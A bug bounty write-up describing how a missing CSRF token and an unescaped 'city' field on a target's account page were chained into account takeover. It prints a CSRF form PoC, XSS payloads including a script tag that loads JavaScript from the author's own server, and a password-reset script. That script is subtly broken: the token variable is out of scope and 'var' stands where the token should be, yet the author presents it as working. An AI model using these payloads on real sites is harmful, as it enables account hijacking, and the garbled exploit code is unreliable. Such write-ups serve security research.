BOOK THIS SPACE FOR AD
ARTICLE ADThis write-up is about my findings of CSRF + XSS and using them both to get a full account takeover. Wish u like it ❤
We always see write-ups / images like this showing the CSRF vs. XSS, But have u ever think to use them together?
Hi boyz, This is my first write-up so excuse me if there were any mistakes or missing of smth..My name is Fares Walid and i am recent full time bug bounty hunter, python/go coder, and interested in Malware Too xDD
This write-up is about my finding in a priv8 program on hackerone, I was able to find:
1. CSRF
2. XSS
3. XSS + CSRF = Account Takeover
I hate time wasting, So let’s start by calling the affected site as: target.com
At first I started opening the website and registered a new user and tested some functions here and there, then one of the most important and lovley parts to test for me, It’s time now for “Account Info/Setting” Section.
First i started to check the changing of some details and inspecting the requests, then i noticed that there are no headers controlling anything or CSRF tokens or any security level!
Quickly I generated a CSRF PoC and tested it:
<html><!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.target.com/?controller=account-service&action=update" method="POST">
<input type="hidden" name="first_name" value="sir" />
<input type="hidden" name="last_name" value="bugs" />
<input type="hidden" name="organization" value="" />
<input type="hidden" name="phone" value="" />
<input type="hidden" name="address_line_1" value="" />
<input type="hidden" name="address_line_2" value="" />
<input type="hidden" name="city" value="mango" />
<input type="hidden" name="zip" value="" />
<input type="hidden" name="country" value="US" />
<input type="hidden" name="state_province" value="Other" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Then i was able to get the **CSRF** !!
Now I started to try to change the password! and i was really happy cuz i didn’t see any requires for the current password!! it’s just requiring the password+confirm password and it’s changed!
I tried to use my CSRF to change the password too!
But I faced smth not good here ..
There was a csrf token used in change password request.
Now i started to test the other inputs and trying to get an XSS!
Then here, I noticed something weird when i tried to but “ ‘ ( ) < > and other chars in the inputs !!
But What was it? After i set the city to: **mango”’>**
I noticed the following!
I tried to set the city to: mango”><script>alert(document.cookie)</script>
That’s so ez, no encoding nothing protecting the requests, here we go.
2. Now i got the XSS with the first CSRF!! What’s it now?
What’s it now? I’ve created a quick js code and uploaded it on my website, then used mango”><script src=”my_js_file_url”></script> as a payload!!
What was the file containing?
<script>var req = new XMLHttpRequest();req.onload = handleResponse;
req.open(‘get’,’/account-details’,true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name=”csrf-passwd” value=”(\w+)”/)[1];
};
var http = new XMLHttpRequest();
http.open("POST", "/change-password", true);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("content").innerHTML = this.responseText;
}
};
http.send("password=123123&confirm_password=123123&csrf_token="+var);
</script>
And boom, Im fully controlling the account now.
Wish you like this write-up, as soon as i get smth interesting to write about it, im gonna share it :D
Have fun and keep digging ❤